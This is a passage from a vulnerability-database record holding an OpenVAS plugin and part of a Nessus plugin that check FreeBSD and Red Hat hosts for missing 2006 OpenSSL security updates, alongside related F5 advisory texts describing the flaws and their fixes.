{"id": "OPENVAS:57475", "type": "openvas", "bulletinFamily": "scanner", "title": "FreeBSD Security Advisory (FreeBSD-SA-06:23.openssl.asc)", "description": "The remote host is missing an update to the system\nas announced in the referenced advisory FreeBSD-SA-06:23.openssl.asc", "published": "2008-09-04T00:00:00", "modified": "2017-12-07T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "http://plugins.openvas.org/nasl.php?oid=57475", "reporter": "Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com", "references": [], "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343"], "lastseen": "2017-12-08T11:44:22", "viewCount": 3, "enchantments": {"score": {"value": 7.2, "vector": "NONE"}, "dependencies": {"references": [{"type": "centos", "idList": ["CESA-2006:0695", "CESA-2006:0695-01"]}, {"type": "cert", "idList": ["VU:247744", "VU:386964", "VU:423396", "VU:547300"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2008-014"]}, {"type": "checkpoint_security", "idList": ["CPS:SK33695", "CPS:SK33771", "CPS:SK35708"]}, {"type": "cve", "idList": ["CVE-2006-2937", "CVE-2006-2938", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343", "CVE-2006-4408", "CVE-2006-5179", "CVE-2007-5135"]}, {"type": "debian", "idList": ["DEBIAN:DSA-1185-1:2C57C", "DEBIAN:DSA-1185-2:4AF37", "DEBIAN:DSA-1195-1:12A42", "DEBIAN:DSA-1195-1:C6A33"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2006-2937", "DEBIANCVE:CVE-2006-2940", "DEBIANCVE:CVE-2006-3738", "DEBIANCVE:CVE-2006-4343", "DEBIANCVE:CVE-2007-5135"]}, {"type": "exploitdb", "idList": ["EDB-ID:28726", "EDB-ID:4773"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:034D322B9C4D058098E22E5788CDA9A0", "EXPLOITPACK:85DFC07A21CE638C0F80271A05CBC86C"]}, {"type": "f5", "idList": ["F5:K6734", "F5:K8106", "SOL6734", "SOL8106"]}, {"type": "freebsd", "idList": ["0F37D765-C5D4-11DB-9F82-000E0C2E438A"]}, {"type": "gentoo", "idList": ["GLSA-200610-11", "GLSA-200612-11", "GLSA-200710-06"]}, {"type": "nessus", "idList": ["3755.PRM", "4632.PRM", "ATTACHMATE_REFLECTION_70_SP1.NASL", "CENTOS_RHSA-2006-0695.NASL", "DEBIAN_DSA-1185.NASL", "DEBIAN_DSA-1195.NASL", "DEBIAN_DSA-1379.NASL", "F5_BIGIP_SOL6734.NASL", "F5_BIGIP_SOL8106.NASL", "FREEBSD_PKG_0F37D765C5D411DB9F82000E0C2E438A.NASL", "GENTOO_GLSA-200610-11.NASL", "GENTOO_GLSA-200612-11.NASL", "GENTOO_GLSA-200710-06.NASL", "MANDRAKE_MDKSA-2006-172.NASL", "MANDRAKE_MDKSA-2006-177.NASL", "MANDRAKE_MDKSA-2006-178.NASL", "MANDRAKE_MDKSA-2007-193.NASL", "NEWSTART_CGSL_NS-SA-2019-0020_OPENSSL098E.NASL", "NEWSTART_CGSL_NS-SA-2019-0033_OPENSSL.NASL", "OPENSSL_0_9_7L_0_9_8D.NASL", "OPENSSL_0_9_8M.NASL", "ORACLELINUX_ELSA-2006-0661.NASL", "ORACLELINUX_ELSA-2006-0695.NASL", "REDHAT-RHSA-2006-0695.NASL", "REDHAT-RHSA-2008-0264.NASL", "REDHAT-RHSA-2008-0525.NASL", "REDHAT-RHSA-2008-0629.NASL", "SLACKWARE_SSA_2006-272-01.NASL", "SOLARIS10_121229-02.NASL", "SOLARIS10_121229.NASL", "SOLARIS10_X86_121230-02.NASL", "SOLARIS10_X86_121230.NASL", "SOLARIS9_113713.NASL", "SOLARIS9_117123.NASL", "SOLARIS9_X86_114568.NASL", "SOLARIS9_X86_122715.NASL", "SUSE_COMPAT-OPENSSL097G-2163.NASL", "SUSE_COMPAT-OPENSSL097G-2171.NASL", "SUSE_OPENSSL-2140.NASL", "SUSE_OPENSSL-2141.NASL", "SUSE_OPENSSL-2162.NASL", "SUSE_OPENSSL-2175.NASL", "SUSE_OPENSSL-2349.NASL", "UBUNTU_USN-353-1.NASL", "UBUNTU_USN-353-2.NASL", "UBUNTU_USN-522-1.NASL", "VMWARE_MULTIPLE_VMSA_2008_0005.NASL", "VMWARE_VMSA-2008-0013.NASL", "XEROX_XRX07_001.NASL"]}, {"type": "openssl", "idList": ["OPENSSL:CVE-2006-2937", "OPENSSL:CVE-2006-2940", "OPENSSL:CVE-2006-3738", "OPENSSL:CVE-2006-4343"]}, {"type": "openvas", "idList": ["OPENVAS:136141256231057491", "OPENVAS:136141256231065349", "OPENVAS:136141256231065603", "OPENVAS:1361412562310835119", "OPENVAS:1361412562310855008", "OPENVAS:1361412562310855018", "OPENVAS:1361412562310855023", "OPENVAS:1361412562310855030", "OPENVAS:1361412562310855170", "OPENVAS:1361412562310855192", "OPENVAS:1361412562310855322", "OPENVAS:1361412562310855346", "OPENVAS:1361412562310855366", "OPENVAS:1361412562310855369", "OPENVAS:1361412562310855376", "OPENVAS:1361412562310855516", "OPENVAS:1361412562310855612", "OPENVAS:1361412562310855640", "OPENVAS:1361412562310855702", "OPENVAS:1361412562310855735", "OPENVAS:1361412562310855742", "OPENVAS:1361412562310855768", "OPENVAS:1361412562310855771", "OPENVAS:1361412562310855780", "OPENVAS:1361412562310855835", "OPENVAS:1361412562310855853", "OPENVAS:1361412562311220191548", "OPENVAS:57478", "OPENVAS:57481", "OPENVAS:57491", "OPENVAS:57511", "OPENVAS:57909", "OPENVAS:57950", "OPENVAS:58053", "OPENVAS:58654", "OPENVAS:61041", "OPENVAS:65349", "OPENVAS:65603", "OPENVAS:835119", "OPENVAS:855008", "OPENVAS:855018", "OPENVAS:855023", "OPENVAS:855030", "OPENVAS:855170", "OPENVAS:855192", "OPENVAS:855322", "OPENVAS:855346", "OPENVAS:855366", "OPENVAS:855369", "OPENVAS:855376", "OPENVAS:855516", "OPENVAS:855612", "OPENVAS:855640", "OPENVAS:855702", "OPENVAS:855735", "OPENVAS:855742", "OPENVAS:855768", "OPENVAS:855771", "OPENVAS:855780", "OPENVAS:855835", "OPENVAS:855853"]}, {"type": "oraclelinux", "idList": ["ELSA-2006-0661", "ELSA-2006-0695", "ELSA-2015-3022", "ELSA-2019-4581", "ELSA-2019-4747"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:62019"]}, {"type": "redhat", "idList": ["RHSA-2006:0695", "RHSA-2008:0264", "RHSA-2008:0525", "RHSA-2008:0629"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:14486", "SECURITYVULNS:DOC:18695", "SECURITYVULNS:DOC:19438", "SECURITYVULNS:VULN:6663"]}, {"type": "seebug", "idList": ["SSV:623", "SSV:65057", "SSV:7704", "SSV:82273"]}, {"type": "slackware", "idList": ["SSA-2006-272-01"]}, {"type": "suse", "idList": ["SUSE-SA:2006:058"]}, {"type": "ubuntu", "idList": ["USN-353-1", "USN-353-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2006-2937", "UB:CVE-2006-2940", "UB:CVE-2006-3738", "UB:CVE-2006-4343"]}, {"type": "vmware", "idList": ["VMSA-2008-0005", "VMSA-2008-0005.1"]}]}, "backreferences": {"references": [{"type": "centos", "idList": ["CESA-2006:0695", "CESA-2006:0695-01"]}, {"type": "cert", "idList": ["VU:423396"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2008-014"]}, {"type": "checkpoint_security", "idList": ["CPS:SK33695", "CPS:SK33771", "CPS:SK35708"]}, {"type": "cve", "idList": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343"]}, {"type": "debiancve", "idList": ["DEBIANCVE:CVE-2006-2940"]}, {"type": "exploitpack", "idList": ["EXPLOITPACK:85DFC07A21CE638C0F80271A05CBC86C"]}, {"type": "f5", "idList": ["SOL6734", "SOL8106"]}, {"type": "freebsd", "idList": ["0F37D765-C5D4-11DB-9F82-000E0C2E438A"]}, {"type": "gentoo", "idList": ["GLSA-200710-06"]}, {"type": "nessus", "idList": ["F5_BIGIP_SOL6734.NASL", "F5_BIGIP_SOL8106.NASL", "FREEBSD_PKG_0F37D765C5D411DB9F82000E0C2E438A.NASL", "MANDRAKE_MDKSA-2006-172.NASL", "OPENSSL_0_9_8M.NASL", "SLACKWARE_SSA_2006-272-01.NASL", "SOLARIS9_113713.NASL", "SOLARIS9_X86_114568.NASL", "SUSE_OPENSSL-2140.NASL", "UBUNTU_USN-522-1.NASL"]}, {"type": "openssl", "idList": ["OPENSSL:CVE-2006-2940"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310855192", "OPENVAS:1361412562310855376", "OPENVAS:1361412562310855702", "OPENVAS:1361412562310855742", "OPENVAS:57511"]}, {"type": "oraclelinux", "idList": ["ELSA-2006-0661"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:62019"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:19438"]}, {"type": "seebug", "idList": ["SSV:65057"]}, {"type": "slackware", "idList": ["SSA-2006-272-01"]}, {"type": "suse", "idList": ["SUSE-SA:2006:058"]}, {"type": "ubuntu", "idList": ["USN-353-2"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2006-3738", "UB:CVE-2006-4343"]}]}, "exploitation": null, "vulnersScore": 7.2}, "pluginID": "57475", "sourceData": "#\n#ADV FreeBSD-SA-06:23.openssl.asc\n# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from vuxml or freebsd advisories\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n#\n\ntag_insight = \"FreeBSD includes software from the OpenSSL Project. The OpenSSL Project is\na collaborative effort to develop a robust, commercial-grade, full-featured,\nand Open Source toolkit implementing the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols as well as a full-strength\ngeneral purpose cryptography library.\n\nSeveral problems have been found in OpenSSL:\n\n1. During the parsing of certain invalid ASN1 structures an error condition\nis mishandled, possibly resulting in an infinite loop. [CVE-2006-2937]\n\n2. A buffer overflow exists in the SSL_get_shared_ciphers function.\n[CVE-2006-3738]\n\n3. A NULL pointer may be dereferenced in the SSL version 2 client code.\n[CVE-2006-4343]\n\nIn addition, many applications using OpenSSL do not perform any validation\nof the lengths of public keys being used. [CVE-2006-2940]\";\ntag_solution = \"Upgrade your system to the appropriate stable release\nor security branch dated after the correction date\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FreeBSD-SA-06:23.openssl.asc\";\ntag_summary = \"The remote host is missing an update to the system\nas announced in the referenced advisory FreeBSD-SA-06:23.openssl.asc\";\n\n \nif(description)\n{\n script_id(57475);\n script_version(\"$Revision: 8023 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-07 09:36:26 +0100 (Thu, 07 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-04 20:41:11 +0200 (Thu, 04 Sep 2008)\");\n script_cve_id(\"CVE-2006-2937\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n name = \"FreeBSD Security Advisory (FreeBSD-SA-06:23.openssl.asc)\";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2006 E-Soft Inc. http://www.securityspace.com\");\n family = \"FreeBSD Local Security Checks\";\n script_family(family);\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/freebsdpatchlevel\", \"login/SSH/success\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-bsd.inc\");\nvuln = 0;\nif(patchlevelcmp(rel:\"6.1\", patchlevel:\"8\")<0) {\n vuln = 1;\n}\nif(patchlevelcmp(rel:\"6.0\", patchlevel:\"13\")<0) {\n vuln = 1;\n}\nif(patchlevelcmp(rel:\"5.5\", patchlevel:\"6\")<0) {\n vuln = 1;\n}\nif(patchlevelcmp(rel:\"5.4\", patchlevel:\"20\")<0) {\n vuln = 1;\n}\nif(patchlevelcmp(rel:\"5.3\", patchlevel:\"35\")<0) {\n vuln = 1;\n}\nif(patchlevelcmp(rel:\"4.11\", patchlevel:\"23\")<0) {\n vuln = 1;\n}\n\nif(vuln) {\n security_message(0);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "naslFamily": "FreeBSD Local Security Checks", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647589307, "score": 0}}

{"f5": [{"lastseen": "2021-06-08T18:49:15", "description": "", "cvss3": {}, "published": "2007-05-17T04:00:00", "type": "f5", "title": "Local OpenSSL vulnerabilities VU#547300 and VU#386964, CAN-2006-3738, CAN-2006-2940, CAN-2006-2937, CAN-2006-4343", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343"], "modified": "2016-01-09T02:26:00", "id": "F5:K6734", "href": "https://support.f5.com/csp/article/K6734", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:49:14", "description": "This security advisory describes the following local OpenSSL vulnerabilities:\n\n * Denial of Service Attacks (CVE-2006-2937, CVE-2006-2940)\n * SSL_get_shared_ciphers() buffer overflow (CVE-2006-3738)\n * SSLv2 Client Crash (CVE-2006-4343)\n\nInformation about this advisory is available at the following location:\n\n<http://www.openssl.org/news/secadv_20060928.txt>\n\n**Note**: This link takes you to a resource outside of AskF5, and it is possible that the information may be removed without our knowledge.\n\nF5 Product Development tracked this issue as CR70064, CR70063, CR69852, and CR69854 for BIG-IP LTM, GTM, ASM and Link Controller, and it was fixed in BIG-IP 9.1.3, 9.3.0, and 9.4.2. For information about upgrading, refer to the BIG-IP LTM, GTM, ASM, or Link Controller release notes.\n\nF5 Product Development tracked this issue as CR69955, CR70725, CR70726 and CR77281 for FirePass, and it was fixed in FirePass 5.5.2. For information about upgrading, refer to the FirePass release notes.\n\nAdditionally, a hotfix with the appropriate fixes is available for FirePass version 5.5.0. Customers affected by this issue can contact [F5 Technical Support](<http://www.f5.com/training-support/customer-support/contact/>), referencing this article number, to request the hotfix. \n \nF5 Product Development tracked this issue as CR69892 for Enterprise Manager, and it was fixed in Enterprise Manager 1.4.0. For information about upgrading, refer to the Enterprise Manager release notes. \n\n", "cvss3": {}, "published": "2007-05-16T00:00:00", "type": "f5", "title": "SOL6734 - Local OpenSSL vulnerabilities VU#547300 and VU#386964, CAN-2006-3738, CAN-2006-2940, CAN-2006-2937, CAN-2006-4343", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343"], "modified": "2013-03-26T00:00:00", "id": "SOL6734", "href": "http://support.f5.com/kb/en-us/solutions/public/6000/700/sol6734.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:49:15", "description": "", "cvss3": {}, "published": "2007-11-16T03:00:00", "type": "f5", "title": "OpenSSL SSL_get_shared_ciphers vulnerability CVE-2007-5135", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2007-5135"], "modified": "2016-01-09T02:29:00", "id": "F5:K8106", "href": "https://support.f5.com/csp/article/K8106", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T18:49:14", "description": "F5 Product Development has determined that the BIG-IP and Enterprise Manager products use a vulnerable version of OpenSSL; however, the vulnerable code is not used in either TMM or in Apache on the BIG-IP system. The vulnerability is considered to be a local vulnerability and cannot be exploited remotely.\n\nF5 Product Development has determined that the FirePass product does not use the OpenSSL SSL_get_shared_ciphers functionality and is not vulnerable to the vulnerability described in this security advisory.\n\nInformation about this advisory is available at the following locations:\n\n<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5135>\n\n<http://www.openssl.org/news/secadv_20071012.txt>\n\n**Note**: The previous links take you to a resource outside of AskF5, and it is possible that the information may be removed without our knowledge.\n\nF5 Product Development tracked this issue as CR87335 for the BIG-IP LTM, GTM, ASM, Link Controller and WebAccelerator version 9.3 software branch and it was fixed in version 9.3.1. For more information about upgrading, refer to the BIG-IP LTM, GTM, ASM, and Link Controller release notes.\n\nF5 Product Development is tracked this issue as CR87358 for the BIG-IP LTM, GTM, ASM, Link Controller and WebAccelerator version 9.4 software branch and it was fixed in version 9.4.5. For information about upgrading, refer to the BIG-IP LTM, GTM, ASM, Link Controller and WebAccelerator release notes.\n\nAdditionally, this issue was fixed in Hotfix HF1 issued for BIG-IP 9.4.4. You may download this hotfix or later versions of the Hotfix from the F5 [Downloads](<http://downloads.f5.com/esd/index.jsp>) site.\n\nF5 Product Development is tracked this issue as CR87358 for Enterprise Manager and it was fixed in version 1.6.0. For information about upgrading, refer to the Enterprise Manager release notes.\n\nFor information about downloading software, refer to SOL167: Downloading software and firmware from F5.\n\nFor information about the F5 hotfix policy, refer to SOL4918: Overview of the F5 critical issue hotfix policy.\n\nFor information about how to manage F5 product hotfixes, refer to SOL6845: Managing F5 product hotfixes.\n", "cvss3": {}, "published": "2007-11-15T00:00:00", "type": "f5", "title": "SOL8106 - OpenSSL SSL_get_shared_ciphers vulnerability CVE-2007-5135", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2006-3738", "CVE-2006-2940", "CVE-2006-2937", "CVE-2006-4343", "CVE-2007-5135"], "modified": "2013-03-26T00:00:00", "id": "SOL8106", "href": "http://support.f5.com/kb/en-us/solutions/public/8000/100/sol8106.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2021-08-19T13:15:15", "description": "Updated OpenSSL packages are now available to correct several security issues.\n\nThis update has been rated as having important security impact by the Red Hat Security Response Team.\n\nThe OpenSSL toolkit provides support for secure communications between machines. OpenSSL includes a certificate management tool and shared libraries which provide various cryptographic algorithms and protocols.\n\nTavis Ormandy and Will Drewry of the Google Security Team discovered a buffer overflow in the SSL_get_shared_ciphers() utility function. An attacker could send a list of ciphers to an application that used this function and overrun a buffer (CVE-2006-3738). Few applications make use of this vulnerable function and generally it is used only when applications are compiled for debugging.\n\nTavis Ormandy and Will Drewry of the Google Security Team discovered a flaw in the SSLv2 client code. When a client application used OpenSSL to create an SSLv2 connection to a malicious server, that server could cause the client to crash. (CVE-2006-4343)\n\nDr S. N. Henson of the OpenSSL core team and Open Network Security recently developed an ASN.1 test suite for NISCC (www.niscc.gov.uk) which uncovered denial of service vulnerabilities :\n\n* Certain public key types can take disproportionate amounts of time to process, leading to a denial of service. (CVE-2006-2940)\n\n* During parsing of certain invalid ASN.1 structures an error condition was mishandled. This can result in an infinite loop which consumed system memory (CVE-2006-2937). This issue does not affect the OpenSSL version distributed in Red Hat Enterprise Linux 2.1.\n\nThese vulnerabilities can affect applications which use OpenSSL to parse ASN.1 data from untrusted sources, including SSL servers which enable client authentication and S/MIME applications.\n\nUsers are advised to upgrade to these updated packages, which contain backported patches to correct these issues.\n\nNote: After installing this update, users are advised to either restart all services that use OpenSSL or restart their system.", "cvss3": {"score": null, "vector": null}, "published": "2006-09-29T00:00:00", "type": "nessus", "title": "RHEL 2.1 / 3 / 4 : openssl (RHSA-2006:0695)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2006-2937", "CVE-2006-2940", "CVE-2006-3738", "CVE-2006-4343"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:openssl", "p-cpe:/a:redhat:enterprise_linux:openssl-devel", "p-cpe:/a:redhat:enterprise_linux:openssl-perl", "p-cpe:/a:redhat:enterprise_linux:openssl095a", "p-cpe:/a:redhat:enterprise_linux:openssl096", "p-cpe:/a:redhat:enterprise_linux:openssl096b", "cpe:/o:redhat:enterprise_linux:2.1", "cpe:/o:redhat:enterprise_linux:3", "cpe:/o:redhat:enterprise_linux:4"], "id": "REDHAT-RHSA-2006-0695.NASL", "href": "https://www.tenable.com/plugins/nessus/22472", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2006:0695. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(22472);\n script_version(\"1.26\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2006-2937\", \"CVE-2006-2940\", \"CVE-2006-3738\", \"CVE-2006-4343\");\n script_xref(name:\"RHSA\", value:\"2006:0695\");\n\n script_name(english:\"RHEL 2.1 / 3 / 4 : openssl (RHSA-2006:0695)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated OpenSSL packages are now available to correct several security\nissues.\n\nThis update has been rated as having important security impact by the\nRed Hat Security Response Team.\n\nThe OpenSSL toolkit provides support for secure communications between\nmachines. OpenSSL includes a certificate management tool and shared\nlibraries which provide various cryptographic algorithms and\nprotocols.\n\nTavis Ormandy and Will Drewry of the Google Security Team discovered a\nbuffer overflow in the SSL_get_shared_ciphers() utility function. An\nattacker could send a list of ciphers to an application that used this\nfunction and overrun a buffer (CVE-2006-3738). Few applications make\nuse of this vulnerable function and generally it is used only when\napplications are compiled for debugging.\n\nTavis Ormandy and Will Drewry of the Google Security Team discovered a\nflaw in the SSLv2 client code. When a client application used OpenSSL\nto create an SSLv2 connection to a malicious server, that server could\ncause the client to crash. (CVE-2006-4343)\n\nDr S. N. Henson of the OpenSSL core team and Open Network Security\nrecently developed an ASN.1 test suite for NISCC (www.niscc.gov.uk)\nwhich uncovered denial of service vulnerabilities :\n\n* Certain public key types can take disproportionate amounts of time\nto process, leading to a denial of service. (CVE-2006-2940)\n\n* During parsing of certain invalid ASN.1 structures an error\ncondition was mishandled. This can result in an infinite loop which\nconsumed system memory (CVE-2006-2937). This issue does not affect the\nOpenSSL version distributed in Red Hat Enterprise Linux 2.1.\n\nThese vulnerabilities can affect applications which use OpenSSL to\nparse ASN.1 data from untrusted sources, including SSL servers which\nenable client authentication and S/MIME applications.\n\nUsers are advised to upgrade to these updated packages, which contain\nbackported patches to correct these issues.\n\nNote: After installing this update, users are advised to either\nrestart all services that use OpenSSL or restart their system.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-2937\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-2940\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-3738\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2006-4343\"\n );\n # http://www.openssl.org/news/secadv/20060928.txt\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.openssl.org/news/secadv/20060928.txt\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2006:0695\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119, 399);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl-perl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl095a\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl096\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:openssl096b\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:2.1\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2006/09/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2006/09/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2006/09/29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2006-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(2\\.1|3|4)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 2.1 / 3.x / 4.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) 